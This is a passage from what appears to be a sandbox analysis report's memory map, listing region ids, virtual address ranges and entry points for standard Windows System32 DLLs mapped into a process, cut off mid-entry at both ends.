0x7ffaea9a0000 end_va = 0x7ffaea9b9fff entry_point = 0x7ffaea9a0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 2453 start_va = 0x7ffaea9c0000 end_va = 0x7ffaea9ccfff entry_point = 0x7ffaea9c0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 2454 start_va = 0x7ffaea9d0000 end_va = 0x7ffaea9e1fff entry_point = 0x7ffaea9d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2455 start_va = 0x7ffaeae70000 end_va = 0x7ffaeaf06fff entry_point = 0x7ffaeae70000 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 2456 start_va = 0x7ffaeaf10000 end_va = 0x7ffaeaf20fff entry_point = 0x7ffaeaf10000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 2457 start_va = 0x7ffaeb090000 end_va = 0x7ffaeb371fff entry_point = 0x7ffaeb090000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 2458 start_va = 0x7ffaeb520000 end_va = 0x7ffaeb52dfff entry_point = 0x7ffaeb520000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2459 start_va = 0x7ffaeb530000 end_va = 0x7ffaeb56ffff entry_point = 0x7ffaeb530000 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 2460 start_va = 0x7ffaeb690000 end_va = 0x7ffaeb6eefff entry_point = 0x7ffaeb690000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 2461 start_va = 0x7ffaeb700000 end_va = 0x7ffaeb9a6fff entry_point = 0x7ffaeb700000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2462 start_va = 0x7ffaebb50000 end_va = 0x7ffaebb5bfff entry_point = 0x7ffaebb50000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2463 start_va = 0x7ffaebc80000 end_va = 0x7ffaebc94fff entry_point = 0x7ffaebc80000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2464 start_va = 0x7ffaebca0000 end_va = 0x7ffaebce0fff entry_point = 0x7ffaebca0000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 2465 start_va = 0x7ffaebd70000 end_va = 0x7ffaec0acfff entry_point = 0x7ffaebd70000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 2466 start_va = 0x7ffaec0b0000 end_va = 0x7ffaec0ccfff entry_point = 0x7ffaec0b0000 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 2467 start_va = 0x7ffaec0d0000 end_va = 0x7ffaec133fff entry_point = 0x7ffaec0d0000 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 2468 start_va = 0x7ffaec140000 end_va = 0x7ffaec17efff entry_point = 0x7ffaec140000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2469 start_va = 0x7ffaec180000 end_va = 0x7ffaec197fff entry_point = 0x7ffaec180000 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 2470 start_va = 0x7ffaec1a0000 end_va = 0x7ffaec1c2fff entry_point = 0x7ffaec1a0000 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 2471 start_va = 0x7ffaec1d0000 end_va = 0x7ffaec214fff entry_point = 0x7ffaec1d0000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 2472 start_va = 0x7ffaec220000 end_va = 0x7ffaec310fff entry_point = 0x7ffaec220000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2473 start_va = 0x7ffaec320000 end_va = 0x7ffaec334fff entry_point = 0x7ffaec320000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 2474 start_va = 0x7ffaec410000 end_va = 0x7ffaec419fff entry_point = 0x7ffaec410000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2475 start_va = 0x7ffaec420000 end_va = 0x7ffaec437fff entry_point = 0x7ffaec420000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2476 start_va = 0x7ffaec440000 end_va = 0x7ffaec5c2fff entry_point = 0x7ffaec440000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2477 start_va = 0x7ffaec5d0000 end_va = 0x7ffaec66efff entry_point = 0x7ffaec5d0000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 2478 start_va = 0x7ffaec670000 end_va = 0x7ffaec6cafff entry_point = 0x7ffaec670000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 2479 start_va = 0x7ffaec6d0000 end_va = 0x7ffaec6fdfff entry_point = 0x7ffaec6d0000 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 2480 start_va = 0x7ffaec700000 end_va = 0x7ffaec75cfff entry_point = 0x7ffaec700000 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 2481 start_va = 0x7ffaec760000 end_va = 0x7ffaec77ffff entry_point = 0x7ffaec760000 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 2482 start_va = 0x7ffaec780000 end_va = 0x7ffaec787fff entry_point = 0x7ffaec780000 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 2483 start_va = 0x7ffaec790000 end_va = 0x7ffaec7a0fff entry_point = 0x7ffaec790000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 2484 start_va = 0x7ffaecfa0000 end_va = 0x7ffaecfb3fff entry_point = 0x7ffaecfa0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2485 start_va = 0x7ffaecfc0000 end_va = 0x7ffaecfd8fff entry_point = 0x7ffaecfc0000 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 2486 start_va = 0x7ffaed050000 end_va = 0x7ffaed057fff entry_point = 0x7ffaed050000 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 2487 start_va = 0x7ffaed060000 end_va = 0x7ffaed0b7fff entry_point = 0x7ffaed060000 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 2488 start_va = 0x7ffaed0c0000 end_va = 0x7ffaed120fff entry_point = 0x7ffaed0c0000 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 2489 start_va = 0x7ffaed140000 end_va = 0x7ffaed156fff entry_point = 0x7ffaed140000 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 2490 start_va = 0x7ffaed160000 end_va = 0x7ffaed172fff entry_point = 0x7ffaed160000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 2491 start_va = 0x7ffaef0b0000 end_va = 0x7ffaef0ccfff entry_point = 0x7ffaef0b0000 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 2492 start_va = 0x7ffaef0d0000 end_va = 0x7ffaef0ecfff entry_point = 0x7ffaef0d0000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 2493 start_va = 0x7ffaef360000 end_va = 0x7ffaef391fff entry_point = 0x7ffaef360000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 2494 start_va = 0x7ffaef4e0000 end_va = 0x7ffaef506fff entry_point = 0x7ffaef4e0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 2495 start_va = 0x7ffaef510000 end_va = 0x7ffaef55bfff entry_point = 0x7ffaef510000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 2496 start_va = 0x7ffaef560000 end_va = 0x7ffaef5defff entry_point = 0x7ffaef560000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2497 start_va = 0x7ffaef5e0000 end_va = 0x7ffaef61bfff entry_point = 0x7ffaef5e0000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 2498 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2499 start_va = 0x7ffaef7b0000 end_va = 0x7ffaef841fff entry_point = 0x7ffaef7b0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 2500 start_va = 0x7ffaef850000 end_va = 0x7ffaef888fff entry_point = 0x7ffaef850000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 2501 start_va = 0x7ffaef890000 end_va = 0x7ffaef898fff entry_point = 0x7ffaef890000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 2502 start_va = 0x7ffaef8a0000 end_va = 0x7ffaef8d4fff entry_point = 0x7ffaef8a0000 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 2503 start_va = 0x7ffaef9c0000 end_va = 0x7ffaef9f5fff entry_point = 0x7ffaef9c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2504 start_va = 0x7ffaf0560000 end_va = 0x7ffaf0568fff entry_point = 0x7ffaf0560000 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 2505 start_va = 0x7ffaf0570000 end_va = 0x7ffaf059cfff entry_point = 0x7ffaf0570000 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 2506 start_va = 0x7ffaf05a0000 end_va = 0x7ffaf05affff entry_point = 0x7ffaf05a0000 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 2507 start_va = 0x7ffaf05b0000 end_va = 0x7ffaf0600fff entry_point = 0x7ffaf05b0000 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 2508 start_va = 0x7ffaf0610000 end_va = 0x7ffaf061bfff entry_point = 0x7ffaf0610000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 2509 start_va = 0x7ffaf0680000 end_va = 0x7ffaf073dfff entry_point = 0x7ffaf0680000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2510 start_va = 0x7ffaf0740000 end_va = 0x7ffaf07d5fff entry_point = 0x7ffaf0740000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 2511 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2512 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2513 start_va = 0x7ffaf0920000 end_va = 0x7ffaf0987fff entry_point = 0x7ffaf0920000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2514 start_va = 0x7ffaf0a90000 end_va = 0x7ffaf0aabfff entry_point = 0x7ffaf0a90000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2515 start_va = 0x7ffaf0de0000 end_va = 0x7ffaf0f10fff entry_point = 0x7ffaf0de0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2516 start_va = 0x7ffaf0f20000 end_va = 0x7ffaf0f5dfff entry_point = 0x7ffaf0f20000 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 2517 start_va = 0x7ffaf0f60000 end_va = 0x7ffaf0f77fff entry_point = 0x7ffaf0f60000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2518 start_va = 0x7ffaf0f80000 end_va = 0x7ffaf1033fff entry_point = 0x7ffaf0f80000 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 2519 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2520 start_va = 0x7ffaf12a0000 end_va = 0x7ffaf12ccfff entry_point = 0x7ffaf12a0000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2521 start_va = 0x7ffaf12d0000 end_va = 0x7ffaf12dffff entry_point = 0x7ffaf12d0000 region_type = mapped_file name = "timebrokerclient.dll" filename = "\\Windows\\System32\\TimeBrokerClient.dll" (normalized: "c:\\windows\\system32\\timebrokerclient.dll") Region: id = 2522 start_va = 0x7ffaf12e0000 end_va = 0x7ffaf130dfff entry_point = 0x7ffaf12e0000 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 2523 start_va = 0x7ffaf1310000 end_va = 0x7ffaf1326fff entry_point = 0x7ffaf1310000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2524 start_va = 0x7ffaf1330000 end_va = 0x7ffaf1371fff entry_point = 0x7ffaf1330000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 2525 start_va = 0x7ffaf1380000 end_va = 0x7ffaf1395fff entry_point = 0x7ffaf1380000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2526 start_va = 0x7ffaf13a0000 end_va = 0x7ffaf13affff entry_point = 0x7ffaf13a0000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 2527 start_va = 0x7ffaf13b0000 end_va = 0x7ffaf141dfff entry_point = 0x7ffaf13b0000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 2528 start_va = 0x7ffaf1420000 end_va = 0x7ffaf1430fff entry_point = 0x7ffaf1420000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2529 start_va = 0x7ffaf1440000 end_va = 0x7ffaf144cfff entry_point = 0x7ffaf1440000 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 2530 start_va = 0x7ffaf1450000 end_va = 0x7ffaf148ffff entry_point = 0x7ffaf1450000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 2531 start_va = 0x7ffaf1490000 end_va = 0x7ffaf158bfff entry_point = 0x7ffaf1490000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 2532 start_va = 0x7ffaf1590000 end_va = 0x7ffaf1609fff entry_point = 0x7ffaf1590000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2533 start_va = 0x7ffaf1620000 end_va = 0x7ffaf1632fff entry_point = 0x7ffaf1620000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2534 start_va = 0x7ffaf1640000 end_va = 0x7ffaf16fffff entry_point = 0x7ffaf1640000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2535 start_va = 0x7ffaf1700000 end_va = 0x7ffaf171dfff entry_point = 0x7ffaf1700000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2536 start_va = 0x7ffaf1720000 end_va = 0x7ffaf1746fff entry_point = 0x7ffaf1720000 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 2537 start_va = 0x7ffaf1750000 end_va = 0x7ffaf17a4fff entry_point = 0x7ffaf1750000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 2538 start_va = 0x7ffaf1880000 end_va = 0x7ffaf18e4fff entry_point = 0x7ffaf1880000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2539 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2540 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2541 start_va = 0x7ffaf1b60000 end_va = 0x7ffaf1b69fff entry_point = 0x7ffaf1b60000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2542 start_va = 0x7ffaf1b70000 end_va = 0x7ffaf1b87fff entry_point = 0x7ffaf1b70000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2543 start_va = 0x7ffaf1b90000 end_va = 0x7ffaf1cdcfff entry_point = 0x7ffaf1b90000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2544 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2545 start_va = 0x7ffaf2b90000 end_va = 0x7ffaf2c07fff entry_point = 0x7ffaf2b90000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2546 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2547 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2548 start_va = 0x7ffaf2e10000 end_va = 0x7ffaf2e1bfff entry_point = 0x7ffaf2e10000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 2549 start_va = 0x7ffaf3170000 end_va = 0x7ffaf31a1fff entry_point = 0x7ffaf3170000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2550 start_va = 0x7ffaf31b0000 end_va = 0x7ffaf3231fff entry_point = 0x7ffaf31b0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2551 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2552 start_va = 0x7ffaf3490000 end_va = 0x7ffaf349bfff entry_point = 0x7ffaf3490000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 2553 start_va = 0x7ffaf3500000 end_va = 0x7ffaf3547fff entry_point = 0x7ffaf3500000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 2554 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2555 start_va = 0x7ffaf36d0000 end_va = 0x7ffaf36ebfff entry_point = 0x7ffaf36d0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2556 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2557 start_va = 0x7ffaf3700000 end_va = 0x7ffaf3725fff entry_point = 0x7ffaf3700000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2558 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2559 start_va = 0x7ffaf38c0000 end_va = 0x7ffaf38c9fff entry_point = 0x7ffaf38c0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 2560 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2561 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2562 start_va = 0x7ffaf3a70000 end_va = 0x7ffaf3aadfff entry_point = 0x7ffaf3a70000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2563 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2564 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2565 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2566 start_va = 0x7ffaf3ea0000 end_va = 0x7ffaf3ec0fff entry_point = 0x7ffaf3ea0000 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 2567 start_va = 